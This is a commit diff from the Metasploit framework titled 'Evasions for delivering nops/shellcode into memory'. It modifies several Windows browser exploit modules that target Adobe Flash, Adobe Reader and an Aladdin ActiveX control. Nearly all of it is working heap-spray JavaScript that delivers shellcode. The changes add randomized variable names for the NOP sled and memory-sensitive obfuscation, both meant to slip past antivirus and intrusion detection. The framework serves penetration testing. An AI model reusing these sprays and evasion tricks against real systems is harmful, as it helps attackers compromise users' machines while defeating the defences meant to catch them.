Land rapid7#8003, Evasions for delivering nops/shellcode into memory

Author: Brent Cook

modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb

@@ -208,11 +208,13 @@ def on_request_uri(cli, request)
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js_pivot = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});

modules/exploits/windows/browser/adobe_flash_rtmp.rb

@@ -138,11 +138,13 @@ def get_rop_chain(t)
   end
 
   def get_easy_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -166,11 +168,13 @@ def get_easy_spray(t, js_code, js_nops)
 
 
   def get_aligned_spray(t, js_rop, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
     var heap_obj = new heapLib.ie(0x20000);
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var rop_chain = unescape("#{js_rop}");
 
     while (nops.length < 0x80000) nops += nops;
@@ -370,7 +374,7 @@ def on_request_uri(cli, request)
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource

modules/exploits/windows/browser/adobe_flash_sps.rb

@@ -114,11 +114,13 @@ def on_request_uri(cli, request)
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
@@ -138,7 +140,7 @@ def on_request_uri(cli, request)
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']

modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb

@@ -208,6 +208,9 @@ def on_request_uri(cli, request)
       js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
     end
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     js = <<-JS
     function heap_spray(heaplib, nops, code, offset, max) {
       while (nops.length < 0x2000) nops += nops;
@@ -222,7 +225,8 @@ def on_request_uri(cli, request)
     }
 
     var heap_obj = new heapLib.ie(0x20000);
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var code = unescape("#{shellcode}");
     heap_spray(heap_obj, nops, code, #{my_target['Offset1']}, #{my_target['Max1']});
     var fake_pointers = unescape("#{pivot}");
@@ -234,7 +238,7 @@ def on_request_uri(cli, request)
     #Javascript obfuscation is optional
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     trigger_file_name = "#{get_resource}/#{rand_text_alpha(rand(3))}.swf"

modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb

@@ -87,14 +87,16 @@ def on_request_uri(cli, request)
 
     # Make some nops
     nops    = Rex::Text.to_unescape(make_nops(4))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Randomize variables
     rand1  = rand_text_alpha(rand(100) + 1)
     rand2  = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
 var #{rand1} = unescape("#{shellcode}");
-var #{rand2} = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var #{rand2} = unescape(#{randnop});
 while (#{rand2}.length < #{target['Size']}) #{rand2} += #{rand2};
 #{rand2} = #{rand2}.substring(0, #{target['Size']} - #{rand1}.length);
 memory = new Array();

modules/exploits/windows/browser/adobe_geticon.rb

@@ -91,13 +91,15 @@ def on_request_uri(cli, request)
     rand10 = rand_text_alpha(rand(100) + 1)
     rand11 = rand_text_alpha(rand(100) + 1)
     rand12 = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
     var #{rand1} = unescape("#{shellcode}");
     var #{rand2} ="";
-    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
+    var #{randnop} = "#{nops}";
+    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{randnop}");
     #{rand4} = #{rand2} + #{rand1};
-    #{rand5} = unescape("#{nops}");
+    #{rand5} = unescape(#{randnop});
     #{rand6} = 20;
     #{rand7} = #{rand6}+#{rand4}.length
     while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};

modules/exploits/windows/browser/adobe_jbig2decode.rb

@@ -85,16 +85,18 @@ def on_request_uri(cli, request)
     rand14	= rand_text_alpha(rand(50) + 1)
     rand15	= rand_text_alpha(rand(50) + 1)
     rand16	= rand_text_alpha(rand(50) + 1)
+    randnop     = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
     var #{rand1} = "";
     var #{rand2} = "";
     var #{rand3} = unescape("#{shellcode}");
     var #{rand4} = "";
+    var #{randnop} = "#{nops}";
 
-    for (#{rand5}=128;#{rand5}>=0;--#{rand5}) #{rand4} += unescape("#{nops}");
+    for (#{rand5}=128;#{rand5}>=0;--#{rand5}) #{rand4} += unescape(#{randnop});
     #{rand6} = #{rand4} + #{rand3};
-    #{rand7} = unescape("#{nops}");
+    #{rand7} = unescape(#{randnop});
     #{rand8} = 20;
     #{rand9} = #{rand8}+#{rand6}.length
     while (#{rand7}.length<#{rand9}) #{rand7}+=#{rand7};

modules/exploits/windows/browser/adobe_media_newplayer.rb

@@ -106,6 +106,7 @@ def on_request_uri(cli, request)
     rand3  = rand_text_alpha(rand(100) + 1)
     rand4  = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
     rand5  = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
+    randnop = rand_text_alpha(rand(100) + 1)
 
     vtbuf = [target.ret].pack('V') * 4
     vtbuf << rand_text_alpha(len - vtbuf.length)
@@ -114,8 +115,9 @@ def on_request_uri(cli, request)
 
     # The printd strings are 72 bytes (??)
     script = %Q|
+var #{randnop} = "#{nops}";
 var #{rand1} = unescape("#{shellcode}");
-var #{rand2} = unescape("#{nops}");
+var #{rand2} = unescape(#{randnop});
 var #{rand3} = unescape("#{retstring}");
 while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
 #{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);

modules/exploits/windows/browser/adobe_utilprintf.rb

@@ -72,13 +72,15 @@ def on_request_uri(cli, request)
     rand9  = rand_text_alpha(rand(100) + 1)
     rand10 = rand_text_alpha(rand(100) + 1)
     rand11 = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
     var #{rand1} = unescape("#{shellcode}");
+    var #{randnop} = "#{nops}";
     var #{rand2} ="";
-    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
+    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(#{randnop});
     #{rand4} = #{rand2} + #{rand1};
-    #{rand5} = unescape("#{nops}");
+    #{rand5} = unescape("#{randnop}");
     #{rand6} = 20;
     #{rand7} = #{rand6}+#{rand4}.length
     while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};

modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb

@@ -115,13 +115,15 @@ def initialize(info={})
   def ie_heap_spray(p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(get_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(get_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
 
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{get_target['Offset']});
     var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
@@ -137,7 +139,7 @@ def ie_heap_spray(p)
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js